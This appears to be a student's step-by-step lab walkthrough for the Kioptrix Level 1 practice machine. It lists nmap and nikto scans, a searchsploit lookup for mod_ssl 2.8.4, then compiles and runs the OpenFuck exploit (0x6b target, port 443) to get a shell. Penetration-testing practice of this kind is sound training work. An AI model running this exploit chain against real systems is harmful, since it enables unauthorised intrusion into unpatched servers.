Kioptrix Level 1

  1. ifconfig

  2. net discover -r 192.168.5.60(your ip )
    attachments/Pasted image 20250319185539.png

  3. nmap -Pn 192.168.5.203 {to find the target ip }
    attachments/Pasted image 20250319190100.png

  4. nmap -T4 -sC -sV -v -Pn 192.168.5.203 -oN kioptrix
    attachments/Pasted image 20250319190124.png

  5. cat kioptrix | grep open
    attachments/Pasted image 20250319190134.png

  6. disable the burp in firefox
    attachments/Pasted image 20250319190148.png

  7. hit the target ip in firebox browswer : 192.168.5.203
    attachments/Pasted image 20250319190206.png

  8. nikto -h http://192.168.5.203
    attachments/Pasted image 20250319190218.png

  9. nikto -h http://192.169.5.203
    attachments/Pasted image 20250319190229.png

  10. nikto -h http://192.168.5.203 > kiopritix_nikto β†’ then control+c
    attachments/Pasted image 20250319190244.png

  11. searchsploit mod ssl 2.8.4
    attachments/Pasted image 20250319190257.png

  12. searchsploit -m 47080
    attachments/Pasted image 20250319190308.png

  13. apt update

  14. open github link in firefox of kali : openfuck github link and download.
    attachments/Pasted image 20250319190335.png

  15. apt-get install libssl-dev

  16. cd Downloads -> ls -l
    attachments/Pasted image 20250319190355.png

  17. gcc -o openfuck openfuck_updated.c -lcrypto
    attachments/Pasted image 20250319190418.png

  18. ./openfuck 0x6b 192.168.5.203 443 -c 40
    attachments/Pasted image 20250319190430.png

  19. type id
    attachments/Pasted image 20250319190440.png

  1. nano 47080.c
    attachments/Pasted image 20250319190505.png

  2. then ctrl + F β†’ https
    attachments/Pasted image 20250319190523.png

  3. edit the https β†’ http β†’ ctrl +s β†’ ctrl + x
    attachments/Pasted image 20250319190540.png

  4. ./openfuck 0x6b 192.168.5.203 443 -c 40
    attachments/Pasted image 20250319190552.png

  5. type id
    attachments/Pasted image 20250319190604.png

---****---